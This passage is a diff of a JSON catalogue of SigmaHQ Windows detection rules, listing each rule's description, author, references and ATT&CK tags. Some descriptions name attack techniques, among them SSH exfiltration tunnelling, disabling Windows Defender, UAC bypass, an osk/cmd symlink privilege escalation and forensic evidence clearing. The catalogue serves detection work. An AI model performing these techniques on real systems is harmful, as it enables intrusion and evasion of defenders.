"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ] - }, - "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", - "value": "ScreenConnect Remote Access" - }, - { - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "meta": { - "author": "frack113", - "creation_date": "2021/08/19", - "falsepositive": [ - "GPO" - ], - "filename": "proc_creation_win_susp_screensaver_reg.yml", + "filename": "proc_creation_win_net_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" - ] - }, - "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", - "value": "Suspicious ScreenSave Change by Reg.exe" - }, - { - "description": "Detects suspicious file execution by wscript and cscript", - "meta": { - "author": "Michael Haag", - "creation_date": "2019/01/16", - "falsepositive": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." 
- ], - "filename": "proc_creation_win_susp_script_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ] - }, - "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", - "value": "WSF/JSE/JS/VBA/VBE File Execution" - }, - { - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", - "value": "Script Interpreter Execution From Suspicious Folder" - }, - { - "description": "Detects a suspicious script executions from temporary folder", - "meta": { - "author": "Florian Roth, Max Altgelt, Tim Shelton", - "creation_date": "2021/07/14", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", - "value": "Suspicious Script Execution From Temp Folder" - }, - { - "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", - "meta": { - "author": "Janantha Marasinghe", - "creation_date": "2022/11/18", - "falsepositive": [ - "Legitimate administrative use" - ], - "filename": "proc_creation_win_susp_secedit.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" ], "tags": [ "attack.discovery", - "attack.persistence", - "attack.defense_evasion", - "attack.credential_access", - "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1087.001", + "attack.t1087.002" ] }, - "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", - "value": "Potential Suspicious Activity Using SeCEdit" + "uuid": 
"d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "value": "Suspicious Reconnaissance Activity Using Net" }, { - "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", + "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { - "author": "Jonhnathan Ribeiro, oscd.community", - "creation_date": "2020/10/16", + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_service_dacl_modification.yml", + "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" ], "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "value": "Suspicious Service DACL Modification" + "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher" }, { - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/18", + "creation_date": "2022/08/05", 
"falsepositive": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", + "filename": "proc_creation_win_tamper_defender_remove_mppreference.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003" - ] - }, - "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", - "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet" - }, - { - "description": "Detects a service binary running in a suspicious directory", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_service_dir.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", - "value": "Suspicious Service Binary Directory" - }, - { - "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", - "meta": { - "author": "frack113", - "creation_date": "2021/07/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_service_modification.yml", - "level": "high", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", - "value": "Stop Or Remove Antivirus Service" + "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "value": "Tamper Windows Defender Remove-MpPreference" }, { - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "description": "Detects WMI spawning a PowerShell process", "meta": { - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", - "creation_date": "2019/10/21", + "author": "Markus Neis / @Karneades", + "creation_date": "2019/04/03", "falsepositive": [ - "Unlikely" + "AppvClient", + "CCM" ], - "filename": "proc_creation_win_susp_service_path_modification.yml", + "filename": "proc_creation_win_wmi_spwns_powershell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" + "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml" ], "tags": [ - "attack.persistence", + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ] + }, + "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "value": "WMI Spawning Windows PowerShell" + }, + { + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "meta": { + "author": "FPT.EagleEye, Nasreddine Bencherchali", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_powershell_snapins_hafnium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.intrinsec.com/apt27-analysis/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "25676e10-2121-446e-80a4-71ff8506af47", + "value": "Exchange PowerShell Snap-Ins Usage" + }, + { + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_dismhost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" + ], + "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1548.002" ] }, - "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", - "value": "Suspicious Service Path Modification" + "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "value": "UAC Bypass Using DismHost" }, { - "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/01", + "author": "Florian Roth", + "creation_date": "2022/12/27", "falsepositive": [ - "Administrator or tools shutting down the services due to upgrade or removal purposes. 
If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" + "Unknown" ], - "filename": "proc_creation_win_susp_service_stop.yml", + "filename": "proc_creation_win_hack_htran.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" + "https://github.com/cw1997/NATBypass", + "https://github.com/HiwinCN/HTran", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_htran.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1489" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ] }, - "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "value": "Suspicious Stop Windows Service" + "uuid": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "value": "Htran or NATBypass Markers" }, { - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" - ] - }, - "uuid": "75578840-9526-4b2a-9462-af469a45e767", - "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322" - }, - { - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/14", - "falsepositive": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" - ], - "filename": "proc_creation_win_susp_servu_process_pattern.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" - ] - }, - "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "value": "Suspicious Serv-U Process Pattern" - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", "meta": { "author": "frack113", - "creation_date": "2021/12/10", + "creation_date": "2022/10/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_sharpview.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/tevora-threat/SharpView/", - "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", 
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" - ] - }, - "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", - "value": "Suspicious Execution of SharpView Aka PowerView" - }, - { - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", - "value": "Suspicious Usage Of ShellExec_RunDLL" - }, - { - "description": "Detects suspicious shell spawned from Java host process (e.g. 
log4j exploitation)", - "meta": { - "author": "Andreas Hunkeler (@Karneades), Florian Roth", - "creation_date": "2021/12/17", - "falsepositive": [ - "Legitimate calls to system binaries", - "Company specific internal usage" - ], - "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "value": "Suspicious Shells Spawned by Java" - }, - { - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/12/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-december-2021", - "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", - "value": "Suspicious Shells Spawn by Java Utility Keytool" - }, - { - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "meta": { - "author": "FPT.EagleEye Team, wagga", - "creation_date": "2020/12/11", - "falsepositive": "No established falsepositives", - "filename": 
"proc_creation_win_susp_shell_spawn_from_mssql.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" - ], - "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", - "value": "Suspicious Shells Spawn by SQL Server" - }, - { - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "meta": { - "author": "Andreas Hunkeler (@Karneades), Markus Neis", - "creation_date": "2021/05/20", - "falsepositive": [ - "Legitimate WinRM usage" - ], - "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", - "value": "Suspicious Processes Spawned by WinRM" - }, - { - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_shimcache_flush.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": 
"b0524451-19af-4efa-a46f-562a977f792e", - "value": "ShimCache Flush" - }, - { - "description": "Use of the commandline to shutdown or reboot windows", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_shutdown.yml", + "filename": "proc_creation_win_susp_logoff.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, - "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", - "value": "Suspicious Execution of Shutdown" + "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "value": "Suspicious Execution of Shutdown to Log Out" }, { - "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "description": "Detects when verclsid.exe is used to run COM object via GUID", "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/23", + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_splwow64.yml", - "level": "high", + "filename": "proc_creation_win_verclsid_runs_com.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218" ] }, - "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "value": "Suspicious Splwow64 Without Params" + "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", + "value": "Verclsid.exe Runs COM Object" }, { - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", "meta": { - "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", - "creation_date": "2021/07/11", + "author": "frack113", + "creation_date": "2022/12/11", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", + "filename": "proc_creation_win_create_link_osk_cmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", + "https://ss64.com/nt/mklink.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_create_link_osk_cmd.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1546.008" + ] + }, + "uuid": "e9b61244-893f-427c-b287-3e708f321c6b", + "value": "Potential Privilege Escalation Using Symlink Between Osk and Cmd" + }, + { + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "High" + ], + "filename": "proc_creation_win_susp_cmd_http_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", + 
"https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" ], "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.t1059.003", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105" ] }, - "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "value": "Suspicious Spool Service Child Process" + "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "value": "Command Line Execution with Suspicious URL and AppData Strings" }, { "description": "Detects Possible Squirrel Packages Manager as Lolbin", 
@@ -54429,500 +43668,100 @@ "value": "Squirrel Lolbin" }, { - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/12", - "falsepositive": [ - "Administrative activity using a remote port forwarding to a local port" - ], - "filename": "proc_creation_win_susp_ssh_port_forward.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ] - }, - "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", - "value": "Suspicious SSH Port Forwarding" - }, - { - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/12", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_ssh_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ] - }, - "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", - "value": "Suspicious SSH Usage RDP Tunneling" - }, - { - "description": "Detects a suspicious svchost process start", + "description": "Detects DarkSide Ransomware and helpers", "meta": { "author": "Florian Roth", - "creation_date": "2017/08/15", + "creation_date": "2021/05/14", "falsepositive": [ - "Unknown" + "Unknown", + "UAC bypass method used by 
other malware" ], - "filename": "proc_creation_win_susp_svchost.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", - "value": "Suspicious Svchost Process" - }, - { - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "meta": { - "author": "David Burkett", - "creation_date": "2019/12/28", - "falsepositive": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" - ], - "filename": "proc_creation_win_susp_svchost_no_cli.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - 